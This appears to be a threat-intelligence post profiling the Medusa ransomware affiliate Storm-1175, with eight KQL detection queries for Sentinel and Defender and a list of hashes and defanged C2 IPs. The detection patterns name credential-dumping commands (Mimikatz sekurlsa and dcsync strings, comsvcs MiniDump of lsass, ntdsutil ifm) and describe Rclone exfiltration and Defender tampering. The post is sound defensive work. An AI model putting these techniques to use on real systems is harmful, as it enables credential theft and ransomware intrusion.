Actor Storm-1175
Motivation Financial / Medusa RaaS affiliate
Targets Healthcare, Education, Finance, Professional Services — AU, UK, US
Dwell time 24 hours (min) to 5–6 days (typical)
Classification TLP:WHITE

Overview

Storm-1175 is a financially motivated cybercriminal actor operating high-velocity ransomware campaigns as an affiliate of the Medusa ransomware-as-a-service (RaaS) platform. The group weaponises N-day and occasional zero-day vulnerabilities in internet-facing systems during the critical window between vulnerability disclosure and widespread patch adoption, achieving initial access to domains spanning healthcare, education, professional services, and finance — primarily across Australia, the United Kingdom, and the United States.

Storm-1175's most defining characteristic is tempo: the actor has moved from initial exploitation to full Medusa ransomware deployment in under 24 hours in documented intrusions, though a five-to-six day dwell time is more typical. The KQL detections in this post target Microsoft Sentinel and Microsoft Defender for Endpoint across the attacker's full kill chain.

Key Risks

Rapid N-day Weaponisation

Storm-1175 has exploited vulnerabilities in as little as one day after public disclosure — CVE-2025-31324 (SAP NetWeaver) was weaponised the day after it was published. Over 16 CVEs have been exploited since 2023 across Exchange, Ivanti, ConnectWise, SimpleHelp, CrushFTP, GoAnywhere MFT, and more.

Double Extortion via Medusa RaaS

Stolen data is staged with Bandizip and exfiltrated using Rclone to attacker-controlled cloud storage before encryption. Files are held for ransom on a Medusa leak site, threatening public release if payment is not made.

Credential and Active Directory Compromise

Storm-1175 pivots to Domain Controllers to dump NTDS.dit, SAM hives, and LSASS memory for offline cracking. Veeam backup credentials are also harvested to extend ransomware reach to connected backup infrastructure.

Security Tool Tampering

The actor modifies Microsoft Defender Antivirus registry keys and adds the entire C:\ drive to exclusion paths via encoded PowerShell before deploying ransomware payloads, eliminating the primary detection layer on targeted endpoints.

KQL Detections

The following queries target Microsoft Sentinel and Microsoft Defender for Endpoint. Each maps to the relevant MITRE ATT&CK technique and covers a distinct phase of the Storm-1175 attack chain.

T1190 T1505.003

1. Web Shell Creation on Internet-Facing Servers (Initial Access)

Storm-1175 drops web shells immediately after exploiting vulnerable web-facing applications (Exchange, Ivanti, TeamCity, ScreenConnect, CrushFTP, GoAnywhere, SmarterMail, BeyondTrust). This query detects file writes to common web-accessible directories by web server worker processes. Tune the folder path list to match your environment's IIS, Tomcat, or application paths.

DeviceFileEvents
| where InitiatingProcessFileName has_any (
    "w3wp.exe", "tomcat.exe", "java.exe",
    "httpd.exe", "nginx.exe", "php-cgi.exe"
    )
| where ActionType in ("FileCreated", "FileModified")
| where FileName has_any (".aspx", ".ashx", ".php", ".jsp", ".jspx")
| where FolderPath has_any (
    @"inetpub\wwwroot", @"webapps\",
    @"htdocs\", @"public_html\", @"\owa\"
    )
| project TimeGenerated, DeviceName, FolderPath, FileName,
         InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
T1136.001 T1098

2. New Local Admin Account Created via Net Commands (Persistence)

On the initially compromised device, Storm-1175 consistently creates a new user account and immediately adds it to the local administrators group using net user /add and net localgroup administrators /add. This query correlates both commands within a five-minute window on the same device, reducing false positives from legitimate IT provisioning.

DeviceProcessEvents
| where FileName in~ ("net.exe", "net1.exe")
| where ProcessCommandLine has "user"
      and ProcessCommandLine has "/add"
| summarize
    Commands   = make_set(ProcessCommandLine),
    FirstSeen  = min(TimeGenerated),
    LastSeen   = max(TimeGenerated),
    EventCount = count()
    by DeviceName, bin(TimeGenerated, 5m)
| where // Both user creation and group add occurred
    Commands has "localgroup" and Commands has "administrators"
| extend DwellSeconds = datetime_diff('second', LastSeen, FirstSeen)
| project FirstSeen, DeviceName, Commands, DwellSeconds, EventCount
| order by FirstSeen desc
T1036 T1021.001

3. Cloudflare Tunnel Masquerading as System Binary (Lateral Movement)

Storm-1175 renames Cloudflare tunnel binaries to mimic legitimate Windows processes such as conhost.exe for covert lateral movement over RDP. This query catches instances where known Windows system binary names are executed from non-standard paths — a strong indicator of masquerading.

DeviceProcessEvents
| where FileName in~ (
    "conhost.exe", "svchost.exe", "lsass.exe",
    "csrss.exe", "services.exe", "explorer.exe"
    )
| where FolderPath !startswith @"C:\Windows\System32"
      and FolderPath !startswith @"C:\Windows\SysWOW64"
      and FolderPath !startswith @"C:\Windows\WinSxS"
| extend
    IsFromTemp  = FolderPath has_any (@"\Temp\", @"\AppData\", @"\ProgramData\"),
    ProcessHash = SHA256
| project TimeGenerated, DeviceName, FileName, FolderPath,
         ProcessCommandLine, IsFromTemp, ProcessHash
| order by TimeGenerated desc
T1003.001 T1112

4. WDigest Credential Caching Enabled via Registry (Credential Access)

Storm-1175 modifies the UseLogonCredential registry value under the WDigest provider to force Windows to cache plaintext credentials in LSASS memory, which are then harvested using Mimikatz or Impacket. Local administrator privileges are required for this modification, so any alert should prompt review of account privilege escalation activity on the same host.

DeviceRegistryEvents
| where RegistryKey has "WDigest"
      and RegistryValueName =~ "UseLogonCredential"
      and RegistryValueData =~ "1"
| extend
    Actor = InitiatingProcessAccountName,
    Cmd   = InitiatingProcessCommandLine
| project TimeGenerated, DeviceName, RegistryKey,
         RegistryValueData, Actor, Cmd,
         InitiatingProcessFileName
| order by TimeGenerated desc
T1003.001 T1003.003

5. LSASS and NTDS Credential Dumping (Credential Access)

Storm-1175 dumps credentials from LSASS using Task Manager, Mimikatz, and Impacket, and accesses the NTDS.dit Active Directory database from compromised Domain Controllers for offline cracking. This query covers three distinct technique variants: Task Manager LSASS dumps, comsvcs.dll MiniDump invocations, ntdsutil NTDS.dit extraction, and Mimikatz command-line indicators.

DeviceProcessEvents
| where (
    // Task Manager LSASS dump
    (FileName =~ "taskmgr.exe"
     and ProcessCommandLine has "lsass")
    // comsvcs MiniDump technique
    or (ProcessCommandLine has_all ("comsvcs.dll", "MiniDump", "lsass"))
    // ntdsutil NTDS.dit extraction
    or (FileName =~ "ntdsutil.exe"
        and ProcessCommandLine has_any ("ac i ntds", "ifm", "create full"))
    // Mimikatz indicators
    or ProcessCommandLine has_any (
        "sekurlsa::logonpasswords",
        "lsadump::sam", "lsadump::dcsync"
        )
    )
| project TimeGenerated, DeviceName, FileName,
         ProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc
T1562.001 T1562.004

6. Defender Antivirus Tampering and Firewall RDP Enablement (Defence Evasion)

Storm-1175 tampers with Microsoft Defender Antivirus registry settings and adds the C:\ drive as an exclusion path via encoded PowerShell before dropping ransomware payloads. The actor also modifies Windows Firewall rules to permit RDP when it is blocked. Both technique classes are covered by this compound query.

union
// Defender registry tampering
(
  DeviceRegistryEvents
  | where RegistryKey has_any (
      "Windows Defender\\Exclusions\\Paths",
      "Windows Defender\\DisableAntiSpyware",
      "Windows Defender\\DisableRealtimeMonitoring"
      )
  | where RegistryValueData in ("1", "C:\\", "C:/")
       or RegistryKey has "Paths"
  | extend AlertType = "DefenderTamper"
  | project TimeGenerated, DeviceName, RegistryKey,
           RegistryValueData, AlertType,
           InitiatingProcessCommandLine
),
// Firewall modification to allow RDP
(
  DeviceProcessEvents
  | where ProcessCommandLine has_all ("netsh", "firewall")
       and ProcessCommandLine has_any ("3389", "remotedesktop", "allow")
  | extend AlertType = "FirewallRDPEnablement",
           RegistryKey = "", RegistryValueData = ""
  | project TimeGenerated, DeviceName, RegistryKey,
           RegistryValueData, AlertType,
           InitiatingProcessCommandLine = ProcessCommandLine
)
| order by TimeGenerated desc
T1048 T1567

7. Rclone Data Exfiltration to Cloud Storage (Exfiltration)

Storm-1175 uses Rclone — frequently renamed to blend in, with the known hash 9632d7e4...672523c observed as lsp.exe — to synchronise victim data to attacker-controlled cloud storage throughout the intrusion. This query detects Rclone by its command-line patterns regardless of the process name, and also flags the known IOC hash directly.

DeviceProcessEvents
| where (
    // Rclone CLI patterns regardless of binary name
    ProcessCommandLine has_any (
        "--config", "--no-check-certificate",
        "--ignore-existing", "--auto-confirm"
        )
    and ProcessCommandLine has_any (
        "copy", "sync", "move", "ls"
        )
    and ProcessCommandLine has_any (
        "mega:", "drive:", "onedrive:",
        "s3:", "ftp:", "sftp:", "pcloud:"
        )
    )
    or SHA256 =~ "9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c"
| extend
    PossibleRclone = FileName,
    TargetCloud    = extract(@"(\w+):", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, PossibleRclone,
         ProcessCommandLine, TargetCloud, SHA256,
         InitiatingProcessAccountName
| order by TimeGenerated desc
T1486 T1484.001

8. Medusa Ransomware Delivery via PDQ Deployer or Group Policy (Impact)

Storm-1175's final stage uses PDQ Deployer to execute RunFileCopy.cmd and distribute Medusa ransomware (Gaze.exe, SHA-256: 0cefeb62...4be96) across the network, or alternatively abuses Group Policy Objects (GPOs) for broad deployment. Alert fidelity is highest when correlated with earlier-stage detections in this ruleset.

union
// PDQ Deployer launching ransomware delivery script
(
  DeviceProcessEvents
  | where InitiatingProcessFileName =~ "PDQDeployRunner.exe"
       or ProcessCommandLine has_any (
           "RunFileCopy.cmd", "Gaze.exe"
           )
       or SHA256 =~ "0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96"
  | extend DeliveryMethod = "PDQ"
  | project TimeGenerated, DeviceName, ProcessCommandLine,
           SHA256, DeliveryMethod
),
// GPO modification as alternative mass-deployment vector
(
  SecurityEvent
  | where EventID in (5136, 5137, 5141)
  | where ObjectClass =~ "groupPolicyContainer"
       or OperationType has_any (
           "Write Property", "Create Object"
           )
  | extend DeliveryMethod = "GPO",
           ProcessCommandLine = "", SHA256 = ""
  | project TimeGenerated, DeviceName = Computer,
           ProcessCommandLine, SHA256, DeliveryMethod
)
| order by TimeGenerated desc

Indicators of Compromise

Indicator Type Description Last Seen
0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96 SHA-256 Gaze.exe (Medusa Ransomware) 2026-03-01
9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c SHA-256 lsp.exe (Rclone) 2026-02-18
e57ba1a4e323094ca9d747bfb3304bd12f3ea3be5e2ee785a3e656c3ab1e8086 SHA-256 main.exe (SimpleHelp) 2026-01-15
5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19 SHA-256 moon.exe (SimpleHelp) 2025-09-22
185.135.86[.]149 IP SimpleHelp C2 2026-03-15
134.195.91[.]224 IP SimpleHelp C2 2026-02-26
85.155.186[.]121 IP SimpleHelp C2 2026-02-12